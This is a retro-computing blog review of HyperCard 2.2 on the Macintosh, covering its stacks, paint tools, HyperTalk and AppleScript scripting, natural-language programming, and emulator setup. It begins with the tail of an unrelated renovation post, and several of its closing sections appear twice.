wiring, and ended up getting valuable advice that saved me a lot of potential headache and additional construction effort. It would be unfair of me to discount the back-breaking effort that goes into construction and renovation work. In software development, you usually don’t end up maiming or killing yourself. I cut myself up accidentally a few times, but luckily it was not that drastic. Even managed to avoid being electrocuted, somehow. I love Torx screws now. Never had a stripped screw head with those, but I had at least 10+ with the normal Phillips heads. The Torx heads have numbers in them, so it’s very difficult to accidentally mess up. Cutting baseboards is my least favourite activity, I can never get the cuts right even with guidance and hand tools. A table saw would have probably helped a bit, but I don’t yet have one. It was fun to learn something in an area that I don’t usually dabble in. It felt incredibly rewarding to take a room that was kind of crummy and turn it into something nice-looking and livable. I made some mistakes, but I see them as a very valuable learning experience that I will hopefully get to utilize when planning and building my dream home, with a garage, workshop, server closet and a great sauna. I love building, I love learning, and that explains my passion for software development and self-hosting very well. It was also good to work on a project with a set goal. It’s unfortunately very often the case in software development that you’ll have a project with non-stop work. No matter what you achieve and where you get with the project, more work awaits. Always. There is little time to regroup, reflect, and be satisfied with what you’ve achieved. There is no set end point. With renovation, I finally felt that, and I wish to bring more of that into my day job. After all that effort, software development doesn’t sound all that bad, even if it has some existential issues around maintenance, security and the freedom to do whatever you want with your devices. removing the old carpet removing the wallpaper (surprisingly difficult and annoying!) plastering, filling in holes painting the walls installing new power sockets installing the cheapest laminate flooring

0 views
Stone Tools 1 months ago

HyperCard on the Macintosh

Throughout the Computer Chronicles 's 19 years on-air, various operating systems had full episodes devoted to them, like Macintosh System 7, UNIX, and Windows 95. Only one piece of consumer software had an entire episode devoted to it. You can see and hear Stewart Chiefet's genuine excitement watching Bill Atkinson show it off. Later, Chiefet did a second full episode on it. HyperCard was a "big deal." Big, new things are scary. In a scathing, paranoid, accidentally prescient article for Compute Magazine 's April 1988 issue, author Sheldon Leemon wrote of HyperCard , "But if this (hypertext) trend continues, we may soon see things like interactive household appliances. Imagine a toaster that selects bread darkness based on your mood or how well you slept the night before. We should all remember that HyperCard and hypertext both start with the word hype. And when it comes to hype, my advice is 'just say no.'" Well, you can't make Leemonade without squeezing a few Leemons, and this Leemon was duly squeezed. "Do we really want to give hypertext to young school children, who already have plenty of distractions? We really don't want him to click on the section where the Chinese invent gunpowder and end up in a chemistry lesson on how to create fireworks in the basement." ( obligatory ironic link ) Leemon-heads were in the minority, obviously. Steve Wozniak called Atkinson's brainchild "the best program ever written." So did David Dunham . There was a whole magazine devoted to it . Douglas Adams said , "( HyperCard ) has completely transformed my working life." The impact it made on the world is felt even today. Cyan started life as a HyperCard stack developer and continues to make games. Wikipedia was born from early experiments in HyperCard . The early web was strongly influenced by HyperCard 's (HyperTalk) vision. Cory Doctorow's first programming job was in HyperCard . Bret Victor built " HyperCard in the World ," which evolved into Dynamicland. With a pedigree like the above, it is no spoiler to say that HyperCard is good. But I must remove the spectacles of nostalgia and evaluate it fairly. A lot has happened since its rise and fall, both technologically and culturally. Can HyperCard still deliver in a vibe-coded TypeScript world? Version 2.2 of HyperCard is significant for a few notable reasons: first, it adds AppleScript support, then it adds a script debugger, and finally it marks the return of HyperCard from Claris back into Apple's fold. Reviewing and evaluating HyperCard is a bit like trying to review and evaluate "The Internet." And MacPaint . And a full application development suite. A sane man would skedaddle upon seeing the 1,000 (!) pages of The Complete HyperCard 2.0 Handbook, 3rd Edition by Danny Goodman, but not this man. Make of that what you will. It's difficult to choose a specific task for this post. I'll build the sample project from the Handbook , but let's note what the book says about its own project, "In a sense, the exercise we’ll be going through in this chapter is artificial, because it implies not only that we had a very clear vision of what the final stack would look like, but that we pursued that vision unswervingly. In reality, nothing could be further from the truth." I have no such clear vision. It's kind of like staring a blank sheet of paper and asking myself, "What should I make?" I could fold it into origami, use it as the canvas for a watercolor painting, or stick it into a Coleco ADAM SmartWriter and type a poem onto it. Art needs boundaries, and I don't yet know HyperCard 's. So, I'll just start at the beginning, launch it, and see where it takes me. Launching HyperCard takes me to the Home "stack," where a "stack" is a group of related "cards" and a card is data supercharged with interaction. In beginner's terms, it's fair to think of a stack as an application, though it requires HyperCard to run. ( HyperCard can build stand-alone apps, but that's not a first-time user's experience). Atkinson does mean to evoke the literal image of a stack of 3x5 index cards, each holding information and linked by relationships you define. Buttons provide the means to act on a card, stepping through them in order, finding related cards by keyword, searching card data, or triggering animations. All of this is possible, trivially so. At first blush that doesn't sound particularly interesting, but MYST was built in it , should you have any doubt it punches above its weight class. Today, I can describe a stack as being "like a web site" and each card as being "like a page of that site," an intellectual shorthand which didn't exist during HyperCard's heyday. To use another modern shorthand, "Home" is analogous to a smartphone's Home screen, almost suspiciously so. You can even customize it by adding or deleting stacks of personal interest to make it your own. 0:00 / 0:36 1× (contains intense flashing strobe effects) Beyond Cyberpunk pushed HyperCard boundaries in its own way. A web version is available , minus most of the original charm. Walking through the Home card, the included stacks provide concrete examples illustrating the power of HyperCard's development tools. Two notable features are present, though they are introduced so subtly it would be easy to overlook them. The first is the database functionality the program gives you for free. Open the Appointments or Addresses stacks, enter some information, and it will be available on next launch as searchable data. It's stored as a flat-file, nothing fancy, and it's easier than Superbase , which was already pretty easy. The second is that after entering new data into a stack, you don't have to save; HyperCard saves automatically. It's happens so transparently it almost tricks you into thinking all apps behave this way, but no, Atkinson specifically hated the concept of saving. He thought that if you type data into your computer and yank the power plug, your data should be as close to perfect as possible. This "your data is safe" behavior is inherent to every stack you use or build. You don't have to opt-in. You don't have to set a flag. You don't have to initialize a container. You don't need to spin up a database server. You don't even have to worry about how to transfer the data to another system; the data is all stored within the data resource of the stack itself. Just copy the stack to another computer and be assured your data comes with you. There is one downside to this behavior as a typical Macintosh end-user. If you want to tinker around with a stack, take it apart, and see how its built, you must make sure you are working with a copy of that stack! As saving happens automatically, it can be easy to forget that your changes are permanent, "I didn't hit save! What happened to my stack?" Thus, an original stack risks getting junked up or even irreparably broken due to your experiments. "Save your changes" behavior is taught to us by every other Macintosh program, but HyperCard bucked the careful conditioning Mac users had learned over the years. At its most basic level, without even wanting to make one's own stacks, HyperCard offers quite a lot. Built-in stacks give the user an address book, a phone directory, an appointment calendar, a simple graph maker, and the ability to run (and inspect!) the thousands of stacks created by others. The bundled stacks are easy to use, but far from being "robust" utilities. That said, they're prettier and easier to user than a lot of the type-in programs from the previous 8-bit era and you're free to modify them to suit your needs, even just aesthetically. Free stacks were available on BBS systems, bundled with books, or on cover disks for magazines. HyperCard offered a first glimpse at something slantingly adjacent to the early world wide web. Archive.org has thousands of stacks you can look through to get a sense of the breadth of the community. Learn about naturalism, read Hitchhiker's Guide to the Galaxy (official release!), or practice your German. There are TWO different stacks devoted to killing the purple children's dinosaur, Barney. Zines, expanded versions of the bundled stacks, games, and other esoterica was available to anyone interested in learning more about clams and clam shell art. I am being quite sincere when I say, "What's not to love?" Content consumption is fine and dandy, but it is on content creation which HyperCard focuses the bulk of its energies. With so many stacks expressing so many ideas, and reading how many of those were made by average people with no programming experience, the urge to join that community is overwhelming. Cards are split into two conceptual domains: the background and the foreground. In modern presentation software like PowerPoint or Google Slides , these are equivalent to the template theme (the stuff that tends to remain static) and the slide proper (the per-slide dynamic attributes). The layers of each domain start with a graphic layer fixed to the "back." Every object added to the domain, like a button, is placed on its own numbered layer above that graphic layer, and those can be reordered. It's simple enough to get one's mind around, but the tools don't do a particularly good job of helping the user visualize the current order of a card's elements. Each element must be individually inspected to learn where it lives relative to other layers (objects). An "Inspector" panel would be lovely. HyperCard has basic and advanced tools for creating the three primary elements which compose a card: text, graphics, and buttons. These elements can exist on both background and/or foreground layers as you wish, keeping in mind that foreground elements get first dibs on reacting to user actions. Text is put down as a "field" which can be formatted, typed into, edited, copy/pasted to & from, and made available to be searched. That grants instant database superpowers to the stack. Usually a field holds an amount of text which fits visually on the card, but it can also be presented as a scrollable sub-window to hold a much larger block of text for when your ideas are just too dang big for the fixed card size. Control over text formatting is more robust than expected. Kerning is non-existent, but font, size, character styles, alignment, and line spacing are available. Macintosh bitmap fonts shipped in pre-built sizes, meaning they were hand-drawn expressly to look their best at those sizes. Scaling text is allowed, but you may need to swallow your aesthetic pride. Or draw the text yourself? "Draw the text yourself" is a real option, thanks to the inclusion of what seems to be a complete implementation of MacPaint 1.x . The tools you know and love are all here, with selectable brush width, paint/fill patterns, lasso tool, shapes both filled and open, spray can, and bitmap fonts (if you don't need that text to be searchable). Yes, even the fabled eraser which drew such admiration during Atkinson's first MacPaint public demo is yours. Yesterday's big deal is HyperCard 's "no big deal." These tools are much more fleshed out than they first appear, as modifier keys unlock all kinds of helpful variants. Hold down while drawing with the pencil tool to constrain it horizontally or vertically. Hold down while using the brush tool to invert its usage into erasure. And so on. The tool palette itself "tears off" from the menu and is far more useful in that state. Double-clicking palette icons reveals yet further tricks: the pencil tool opens "fat bits" mode, the eraser clears the screen. The Handbook devotes over 80 pages to the drawing functions. I'll just say that if you can think it, you can draw it. Remember two gotchas: there's only one level of undo, and all freehand drawing happens in a single layer . The pixels you put down overwrite the pixels that are there, period. The inclusion of a full paint program makes it really fun to have an idea, sketch it out, see how it looks, try it, and seamlessly move back and forth between art and design tools (and coding tools). The ease of switching contexts feels natural and literal sketches instantly become interactive prototypes. Or final art, if you like! Who am I to judge? It's kind of startling to be given so much freedom in the tools. As an aside, I took a quick peek at modern no-code editor AirTable and tried to build a simple address book. Beyond the mandatory signup and frustration I felt poking around the tools, I wasn't allowed to place a header graphic without paying a subscription fee. Progress! What is hypermedia without hyperlinks? In HyperCard these are implemented as buttons, and if you've ever poked around in Javascript on the web, you already have a good "handle" (wink wink) on how they work. Like text fields, they have a unique ID, a visual style, and can trigger scripts. Remember, HyperCard debuted with scripting in 1987 and similar client-side scripting didn't appear in web browsers until Netscape Navigator 2.0 c irca 1995. This was bleeding edge stuff. Adding an icon to a button is a little weird, thanks to classic Macintosh "resource forks." All images are stored in this special container, located within the stack file itself. You can't just throw a bunch of images into a folder with a stack and access them freely. Like the lack of multiple undo, this requires a bit of "forget what you know, visitor from the future." Knowing icon modification is a pain in the butt, Atkinson helpfully added an entire icon editor mini-program to HyperCard . Typically you would have to modify these using ResEdit, a popular, free tool from Apple which allowed users to visually inspect an application's resource fork. Here's a 543 page manual all about it. (Were authors paid by the cubic centimeter back then?) With ResEdit , all sorts of fun things could be tweaked in applications and even the Finder. You could redraw icons shown during system level alerts and bomb events, or the fill patterns used to draw progress bars. You could hide or show menus in an application, change sound effects, and more. It's dangerous territory, screwing around with system resources, but it's kind of fun because its dangerous. Hack the system! Buttons can be styled in any number of normal, typical, Macintosh-y ways, but can also be transparent. A transparent button is just a rectangle defining a "hotspot" on the screen, especially useful on top of an image which already visually presents itself as "clickable." To add a hyperlink to text, draw a transparent button on top of that text, wire it up, and you're done. I imagine you can already see the problem. Rewrite the text. Now you have to manually reposition your button to overlay the new position of the rewritten text which will last for exactly as long as the text never gets moved or edited. Sure hope the text didn't split onto two lines during the move. HyperCard does have a sneaky way to fake this up programmatically, but HTML hyperlinks in text would prove to be an unquestionable improvement. Yet, HyperCard speeds ahead of yet-to-arrive-HTML once more with image hyperlinks. Draw or paste in a picture, say a map of Europe, then draw transparent buttons directly on top of each country. When you're done, it looks like a normal map, but now has clickable countries, which could be directed to transition with a wipe to an information page about the clicked country without ever touching a script. HyperCard 's links are a little brain-dead to be sure, but they are also conceptually very, very easy to grasp. What I really enjoy about the HyperCard approach is how it leverages existing knowledge of GUIs and extends that a little into something familiar yet significantly more powerful. This may be the biggest gap in HyperCard 's tool-set. This is not to say that sound effects are completely missing, but they are not given nearly the same thoughtful attention as graphics and scripting are. For reference, where graphics get 80+ pages in the manual, sound gets less than 10. You can only attach sound effects to your cards through scripting. That can be simple beeps, a sequence of notes in an instrument voice, or a prerecorded sound file. Given the lavish set of tools for drawing, I did honestly expect to have at minimum a piano keyboard for inputting simple compositions. There were music-making stacks to assist with simple compositions, shunting off responsibility to third party software. That's not a crime, per se, but does feel like a noteworthy gap in an otherwise robust tool-set. In the manual, a no-code tutorial builds a custom Daily To-Do stack, with hyperlink buttons, searchable text, and custom art in just 30 pages. By the end of the tutorial the user has hand-crafted a useful application to personal specifications, which can even be shared with the world, if desired. Not a bad day's work, and I'd be hard-pressed to duplicate that feat today, to be perfectly honest. This is a deeply empowering program. Even with just 30 minutes of work the user has the beginnings of something interesting . The gap between the user's daily apps and what she's able to build in a weekend at least feels smaller than the gap between and her daily drivers. Success looks achievable. To-do lists, address books, recipe cards, and the like are all well and good, but every artist eventually feels that urge to push forward and move beyond . At this point I'm only 1/3 through the book so what could the other 600 pages possibly have to talk about? The same thing the rest of this post will: programming. I know, I know, for a lot of people this is a boring, obtuse topic. Believe me, I understand. A lot of people were put off by programming until HyperCard made it accessible. In the January 1988 Compute Magazine (Leemon's rant shows up a few months later), David D. Thornburg noted, "it proves that the proper design of a language can open up programming to people who would never think of themselves as programmers." This is backed up by firsthand quotes during HyperCard 's 25th anniversary The fact is, if you've poked around in HyperCard at all you've already been programming , you just didn't know it. We call it "no-code" now, though I'd argue HyperCard is more like a coding butler. There is code, you just aren't required to write it for many common tasks. 0:00 / 0:22 1× "No code" only applies to you , the end-user. HyperCard is programming on your behalf. HyperTalk, Dan Winkler's contribution to the project, is HyperCard 's bespoke scripting language. Patterned after Pascal, a popular development language for the Macintosh at the time ( Photoshop was originally developed in Pascal ), HyperTalk was designed be as easy to read and write as possible. In so doing, it attempts to tear down the gates of programming and offer equal access to its community. At its core, HyperCard is a collection of objects which send and receive messages. HyperTalk takes an object-oriented approach to stack development. There are four types of HyperCard objects: stack, card, button, and text field. Let's consider the humble button. A button can receive a message, like "the user clicked the mouse on me." When that occurs, the button has an opportunity to respond to that message in some fashion. Maybe it displays a graphic image. Maybe it plays a sound. Maybe it sends its own message to a different object to do something else. Scripts define when and how objects process messages. In HyperCard 's visual editor, scripts are kind of "inside" objects. Double-click a button to poke at its internal anatomy, with the script being its "brain." Even if you don't know how to write a HyperTalk script, you can probably read it without much difficulty. Baby steps. Pressing a button on your mouse moves that button physically "down," and lifting your finger allows it to move back "up." So this script says "when the mouse button is released, beep." Want three beeps? Forget the beeps, let's go to the next card of this stack. No, not this stack, go to the last card of a different stack. Want to add a visual transition using a special effect and also do the other stuff? This compositional approach to development helps build skills at a natural pace. Add new behaviors as you learn and see the result immediately. Try new stuff. Tinker. Guess at how to do something. Saw something neat in another stack? Open it and copy out what you like. Experiment. Share. Play. HyperCard wants us to have fun. I am having fun. HyperTalk provides fast iteration on ideas and allows us to describe our intent in similar terminology as we have learned over time as end-users. The perceived distance between "desire" and "action" is shortened considerably, even if this comes with unexpected gotchas. The big gotcha can be a bit of a rude awakening, as English-ish languages tend to be. At first, they seem so simple, but in truth they are not as flexible as true natural language. Going back to the earlier examples, can you intuit which of the following will work and which will error? They all seem reasonable, but only the third one works. This is where the mimicry of English fails the language, because English-ish suggests to a newcomer a free-form expression of thought which HyperTalk cannot hope to understand. Programmers understand that function names and the parameters which drive them are necessarily rigid and ordered. A more programmer-y definition of the command might be Thus exposed, those familiar with typical coding conventions will immediately understand that HyperTalk (often) requires a similarly specific order of parameters to a command. We can't do this. We must rather adhere to the language's hidden order. HyperCard comes with help documentation in the form of searchable stacks, complete with sample scripts to test and borrow from as one grows accustomed to its almost-English sensibilities. Still, it can absolutely be frustrating when something that appears to be valid, like , fails. Another knock against HyperTalk's implementation in HyperCard is the code editor itself. It is so bare-bones I thought I had missed something when installing the program. It will format your code indentation, and that's it. At no point will you receive any warning of any kind of mistake. It happily accepts whatever you write. Only upon trying to run a script will errors surface. On the one hand it is fast and easy to write a script and test it. But it is still requires extra steps which could have been avoided had the editor behaved a bit more like Script Editor , the AppleScript development tool bundled with Mac OS. Script Editor watches your back a little more diligently. Despite the not-quite-English frustrations, it is still comfortably ahead of any other option of the day. The "Hello World" of HyperCard is a fully functional to-do management application. What a good feeling that engenders in a Mac user dipping a cautious toe into development waters. That feeling builds trust in the system and oneself, and maybe, just maybe, grows a desire to keep learning. The full list of things you can do with HyperTalk is too vast to cover. Here's a teensy weensy super tiny overview of a much longer list, just to whet your appetite: A few example properties you can set on objects: A small sampling of some built-in functions: You have plenty of boolean, arithmetic, logical, string, and type operators to solve a wide range of common problems. If you're missing a function, write a new function and use it in your scripts the same as any native command. If some core functionality is missing, HyperCard can be extended via XCMDs and XFCNs, which are new commands and functions built in native code. These can do things like add color support, access SQL databases, digitize sounds, and even let you use HyperCard to compile XCMDs inside of HyperCard itself. Real ouroboros stuff that. With HyperCard 2.2, AppleScript was added as a peer development language. At one point, HyperTalk was considered to become not just HyperCard 's scripting language, but the system-wide scripting language for the entire Macintosh ecosystem. AppleScript was developed instead, taking obvious cues from HyperTalk, while throwing all kinds of shade on Dave Winer's ( that guy again !) Frontier . Ultimately , Frontier got Sherlocked . AppleScript allows for scripting control over the system and its applications. Here's a sample (circa System 7.5.5) Like HyperTalk, you can probably understand that even if you can't write it off the top of your head. Through this synergy, external applications can be controlled directly by HyperCard . PageMaker 5.0 even shipped with a HyperCard stack. In the video below, I'm clicking a HyperCard button, prompting for text, then shoving that text into an external text editor and applying styling. 0:00 / 0:13 1× The elephant in the room Now, all of this talk about using plain English to program has many of you shouting at the screen. Don't worry, I hear you loud and clear. I agree, we should talk about a modern natural language programming environment. Let's talk about Inform 7. For those who don't know, Inform has been a stalwart programming language for the development of interactive fiction (think Zork , and other text adventures) for decades. For the longest time, Inform 6 was the standard-bearer and it looked like "real programming code" complete with semicolons, so you know it was "serious." This describes the room to the player, defines where the exits lead, and specifies that the room has light. From the "Cloak of Darkness" sample project. In the early 2000's, Inform creator Graham Nelson had an epiphany. Text adventure engines have an in-game parser which accepts English language player input and maps it to code. Could we use a similar parser to accept English language code and map it to code? Inform 7 is the result of that research and attempts something significantly more dramatic than HyperTalk. Let's see how to describe that same room from earlier. I know you might be incredulous, but this is legit Inform 7 code which compiles and plays. Inform 7 certainly looks far more natural than the mimicry of HyperTalk. This looks like I can have a conversation with the system and it will do what I want. Attempt 1. This does not work. How embarrassing. Let me try that again. Attempt 2. I have to say "holds" not "has" to give the stone to the player. The "if" section continues to fail. Success! Though we had to take a suspiciously programmery approach to get it to work. Also we use "holds" to give the object to the player, but use "carries" to check inventory. Obviously, emphasis here is it "looks like" I can write whatever I want, but look too hard and the trick of all such systems is revealed: to program requires programming and programming requires structure. Learning how to structure one's thoughts to build a program which works as expected is the real lesson to learn. That lesson can sometimes be obfuscated by the friendly languages. Alright, alright, I'll talk about vibe coding, but what, realistically, is there to say? It's a new phenomenon with very little empirical evidence to support or refute the claims of its efficacy. One barrier it may remove is of reliance on English as the base language for development tasks. A multi-lingual HyperCard -alike could be something special indeed. I asked ChatGPT to recreate a HyperCard stack for me in HTML with this prompt. Here's the result. Here's the code. It seems to work, but I don't know know web development enough to verify it. Nor is there impetus for me to learn to understand it. I could just as easily have asked for this in "the best language for this purpose." Unlike HyperTalk, this approach doesn't ask me to participate in the process which achieved the result, the result itself is all I'm asked to evaluate. When I asked for a change, I receive an entirely different design and layout, but it did contain the functional change. Was that battle won or lost? I also have no idea how to test this, because my spec was also vibes. I could write a complete spec and ask the LLM to build to that, I suppose. There are people in software development who do exactly that, and they are not called "coders." This is "vibe product management." I'm unqualified to determine if that's good enough, but I can say that there is at least one person who seems quite happy with her vibe coding results. While I'm pretty sure her project could be built in HyperCard in an hour, HyperCard doesn't exist. Of course novices like her will turn to LLMs. What other option is there? I would like to point out, however, that with "vibe coding" we aren't seeing the same Precambrian explosion of new life like we did after HyperCard debuted. So I sure have spent a good amount of time talking about the pitfalls and quicksand of using natural language as a programming language. Once we've built simple tools with ease, we quickly learn how much we don't know about programming when we try more advanced techniques. There appears to be a barrier beyond which it makes development harder. This has been covered by many people over the years. Dave Winer, of ThinkTank fame, had thoughts on this , "Hypercard was sold this way, as was COBOL. You'd tell the system, in English, what you wanted and it would make it for you. Only trouble is the programming languages only looked superficially like English, to someone who didn't know anything about programming. Once you got into it, it was programming." Yep. In the February 1998 Compute Magazine , Thornburg concluded his review of HyperCard , "My feeling at this time is that HyperCard lowers the barrier to creating applications for the Mac by quite a bit, but it still requires the discipline and planning required for any programming task." Fair enough. Edsger W. Dijkstra had thoughts on the matter of natural language as a programming language. He said of this pursuit, "When all is said and told, the "naturalness" with which we use our native tongues boils down to the ease with which we can use them for making statements the nonsense of which is not obvious." It's true, it can be hard to describe to another human what we want, let alone a computer. We humans are nothing if not walking contradictions, in word and action. If you'll indulge me, I'd like to issue my bold rebuttal to all of this. So what if these languages aren't mathematical rigorous enough for "serious" programming? So what if they're hard to scale? So what if we sometimes get caught up in English-ish traps? So what if using these tools create "bad" (Dijkstra's word) habits which prove hard to overcome? I'm not naive; I wouldn't run a nuclear reactor on HyperTalk. However, I'm concerned that movements in programming "purity" have also gatekept the hobbyist population. Thousands of people built thousands of stacks in HyperCard . Businesses were born from it. Work got done. Non-programmers built software that helped themselves or helped other people. Isn't that the whole point of programming, is to help people solve problems? HyperCard and HyperTalk should have set a new baseline for what our computers do right out of the box. There is a case study of a Photoshop artist working for a major retail advertising department, who didn't know a thing about programming, despite many attempts. It was precisely the English-ish language of AppleScript which finally allowed the principles and structure of programming to "click." He has worked as a professional iOS developer for almost 20 years now. I doubt you're biting your nails in suspense, "Who could this mystery person possibly be?!" It was me. There is a direct line, a single red thread on the conspiracy cork-board, between my exposure to AppleScript and my current job now an iOS engineer. Seeing people's work become just a little bit easier with the AppleScript tools I built was incredibly gratifying. Those benefits were tangible, measurable. What I built was as real as any "proper" application. When I outgrew AppleScript, I moved on. Whatever bad habits I had learned, I unlearned. Was this a difficult path toward software engineering enlightenment? Perhaps, but it was my path and it was thanks to tools which were willing to meet me halfway. I think everyone should absolutely use HyperCard , but probably not for the reason you think. I do not kid myself into believing HyperCard can be a useful daily driver, except for the most tenacious of retro-enthusiast. Like other retro software, if you want to build something for yourself and it's useful, then that's great! But, the browser won the hypertext war, period. I can quote every positive review. I can enumerate every feature. I can show you stacks in motion, and you wouldn't be wrong to shrug in response. I get it. You're a worldly individual; you've seen it all before. I don't think you've felt it before, though. HyperCard must be touched to be understood. So do it. Build a few cards, a small stack even, and appreciate how HyperCard 's fluidity matches that of human expression. Feel the ease with which your ideas become reality. Build something beautiful. Now throw it all away. Then you'll understand that the only way to appreciate its brilliance is to have it taken away. When you're back in present-day, wondering why a 20GB application can't afford the same flexibility as this 1MB dynamo, then you'll understand. "Why can't I change this? Why can't I make it mine?" Such questions will cut you in a dozen small ways every day, until you're nothing but scar tissue. Then you'll understand. I don't think you'd be reading this blog if you didn't believe, deep down in your core, "things could be better." HyperCard is concrete evidence which supports that belief. And it was created and killed by the same company which voiced precisely the same "things could be better" conviction in their "1984" commercial. Apple called for a revolution. I'm calling for the next one. 0:00 / 0:22 1× My final "To Do" stack. I went beyond the book and made large, animated daily tabs (a tricky exploration of HyperCard's boundaries, as they exceed the 32x32px max icon size) and a search field. I had a lot of trouble setting up my work environment this time around. The primary stumbling block is that Basilisk II, which initially made the whole Mac environment setup easy, has a Windows timing bug which renders HyperCard animations unusably slow. Mini vMac works great with HyperCard , and feels very snappy, but it couldn't handle a disk over 2GB (I had built a 20GB hard drive for Basilisk II). So I tried to build a new disk image in Mini vMac but it has a weird issue where multi-disk installations "work" except the system ejects the first disk it sees to "accept" the next disk in the install process. That disk was the disk I was trying to install the operating system onto, so the whole endeavor became a comedy of errors. I had to go back into Basilisk II to build a 2GB disk for use in Mini vMac . There's not really a foolproof way to do this. HyperCard 's stack format has been reverse-engineered and made compatible after-the-fact by a few modern attempts to revive the platform. Importing a stack into a modern platform is possible, as is conversion to HTML. There's going to be a lot of edge cases and broken things during this process, but it's worth it if the stack is awesome. You did build an awesome stack, didn't you?! (I don't think any of these ford the AppleScript river though.) Mini vMac v36.04 for x64 on Windows 11 Running at 4x speed Magnification at 2x Macintosh System 7.5.5 (last version Mini vMac supports) Adobe Type Manager v3.8.1 StickyClick v1.2 AppleScript additions 8MB virtual RAM ( Mini vMac default) HyperCard 2.2 w/scripting additions It seems to work, but I don't know know web development enough to verify it. Nor is there impetus for me to learn to understand it. I could just as easily have asked for this in "the best language for this purpose." Unlike HyperTalk, this approach doesn't ask me to participate in the process which achieved the result, the result itself is all I'm asked to evaluate. When I asked for a change, I receive an entirely different design and layout, but it did contain the functional change. Was that battle won or lost? I also have no idea how to test this, because my spec was also vibes. I could write a complete spec and ask the LLM to build to that, I suppose. There are people in software development who do exactly that, and they are not called "coders." This is "vibe product management." I'm unqualified to determine if that's good enough, but I can say that there is at least one person who seems quite happy with her vibe coding results. While I'm pretty sure her project could be built in HyperCard in an hour, HyperCard doesn't exist. Of course novices like her will turn to LLMs. What other option is there? I would like to point out, however, that with "vibe coding" we aren't seeing the same Precambrian explosion of new life like we did after HyperCard debuted. The struggle is real So I sure have spent a good amount of time talking about the pitfalls and quicksand of using natural language as a programming language. Once we've built simple tools with ease, we quickly learn how much we don't know about programming when we try more advanced techniques. There appears to be a barrier beyond which it makes development harder. This has been covered by many people over the years. Dave Winer, of ThinkTank fame, had thoughts on this , "Hypercard was sold this way, as was COBOL. You'd tell the system, in English, what you wanted and it would make it for you. Only trouble is the programming languages only looked superficially like English, to someone who didn't know anything about programming. Once you got into it, it was programming." Yep. In the February 1998 Compute Magazine , Thornburg concluded his review of HyperCard , "My feeling at this time is that HyperCard lowers the barrier to creating applications for the Mac by quite a bit, but it still requires the discipline and planning required for any programming task." Fair enough. Edsger W. Dijkstra had thoughts on the matter of natural language as a programming language. He said of this pursuit, "When all is said and told, the "naturalness" with which we use our native tongues boils down to the ease with which we can use them for making statements the nonsense of which is not obvious." It's true, it can be hard to describe to another human what we want, let alone a computer. We humans are nothing if not walking contradictions, in word and action. If you'll indulge me, I'd like to issue my bold rebuttal to all of this. So what? So what if these languages aren't mathematical rigorous enough for "serious" programming? So what if they're hard to scale? So what if we sometimes get caught up in English-ish traps? So what if using these tools create "bad" (Dijkstra's word) habits which prove hard to overcome? I'm not naive; I wouldn't run a nuclear reactor on HyperTalk. However, I'm concerned that movements in programming "purity" have also gatekept the hobbyist population. Thousands of people built thousands of stacks in HyperCard . Businesses were born from it. Work got done. Non-programmers built software that helped themselves or helped other people. Isn't that the whole point of programming, is to help people solve problems? HyperCard and HyperTalk should have set a new baseline for what our computers do right out of the box. If this is your idea of no-code Nirvana, I'm not going to stand in your way. I'm not going to join you, but I'm not going to stop you. Plot twist There is a case study of a Photoshop artist working for a major retail advertising department, who didn't know a thing about programming, despite many attempts. It was precisely the English-ish language of AppleScript which finally allowed the principles and structure of programming to "click." He has worked as a professional iOS developer for almost 20 years now. I doubt you're biting your nails in suspense, "Who could this mystery person possibly be?!" It was me. There is a direct line, a single red thread on the conspiracy cork-board, between my exposure to AppleScript and my current job now an iOS engineer. Seeing people's work become just a little bit easier with the AppleScript tools I built was incredibly gratifying. Those benefits were tangible, measurable. What I built was as real as any "proper" application. When I outgrew AppleScript, I moved on. Whatever bad habits I had learned, I unlearned. Was this a difficult path toward software engineering enlightenment? Perhaps, but it was my path and it was thanks to tools which were willing to meet me halfway. Get hyped I think everyone should absolutely use HyperCard , but probably not for the reason you think. I do not kid myself into believing HyperCard can be a useful daily driver, except for the most tenacious of retro-enthusiast. Like other retro software, if you want to build something for yourself and it's useful, then that's great! But, the browser won the hypertext war, period. I can quote every positive review. I can enumerate every feature. I can show you stacks in motion, and you wouldn't be wrong to shrug in response. I get it. You're a worldly individual; you've seen it all before. I don't think you've felt it before, though. HyperCard must be touched to be understood. So do it. Build a few cards, a small stack even, and appreciate how HyperCard 's fluidity matches that of human expression. Feel the ease with which your ideas become reality. Build something beautiful. Now throw it all away. Then. Then! Then you'll understand that the only way to appreciate its brilliance is to have it taken away. When you're back in present-day, wondering why a 20GB application can't afford the same flexibility as this 1MB dynamo, then you'll understand. "Why can't I change this? Why can't I make it mine?" Such questions will cut you in a dozen small ways every day, until you're nothing but scar tissue. Then you'll understand. I don't think you'd be reading this blog if you didn't believe, deep down in your core, "things could be better." HyperCard is concrete evidence which supports that belief. And it was created and killed by the same company which voiced precisely the same "things could be better" conviction in their "1984" commercial. Apple called for a revolution. I'm calling for the next one. 0:00 / 0:22 1× My final "To Do" stack. I went beyond the book and made large, animated daily tabs (a tricky exploration of HyperCard's boundaries, as they exceed the 32x32px max icon size) and a search field. Sharpening the Stone I had a lot of trouble setting up my work environment this time around. The primary stumbling block is that Basilisk II, which initially made the whole Mac environment setup easy, has a Windows timing bug which renders HyperCard animations unusably slow. Mini vMac works great with HyperCard , and feels very snappy, but it couldn't handle a disk over 2GB (I had built a 20GB hard drive for Basilisk II). So I tried to build a new disk image in Mini vMac but it has a weird issue where multi-disk installations "work" except the system ejects the first disk it sees to "accept" the next disk in the install process. That disk was the disk I was trying to install the operating system onto, so the whole endeavor became a comedy of errors. I had to go back into Basilisk II to build a 2GB disk for use in Mini vMac . Emulator Improvements I found 4x speed in the emulator felt very nice; max speed for installations. Install the ImportFl and ExportFl utilities for Mini vMac to get data into and out of the virtual Macintosh from your host operating system easily. The emulator never crashed, though I definitely had troubles with Macintosh apps crashing or running out of memory. While I could get the emulator to boot with my virtual hard drive, I couldn't get that to persist during a "system reboot." Maybe there's a setting I overlooked. Don't forget to "Get Info" on your apps and manually set their memory usage. Extensions enable classic Mac conveniences. I recommend StickyClick , otherwise you have to continuously hold the mouse button down when using menus. Decker looks very much like HyperCard , but looks only. No importing of original stacks and the scripting language is completely different, but that adorable drawing app built in it looks great! Source code for Decker here! LiveCode is trying to keep the dream alive in a modern context and can apparently import HyperCard stacks (with caveats). (note: a completely new version, with obligatory AI, went live just a few days before this post!) HyperNext Studio might be interesting to some. Stacksmith seems to have stalled out in development, but could be fun to play around with. HyperCard Simulator looks quite interesting and has a stack importer. 日本語でも使えるよ! I imported Apple's "HyperTalk Reference" stack without issue, though its hyperlinks don't work; I can step through cards. 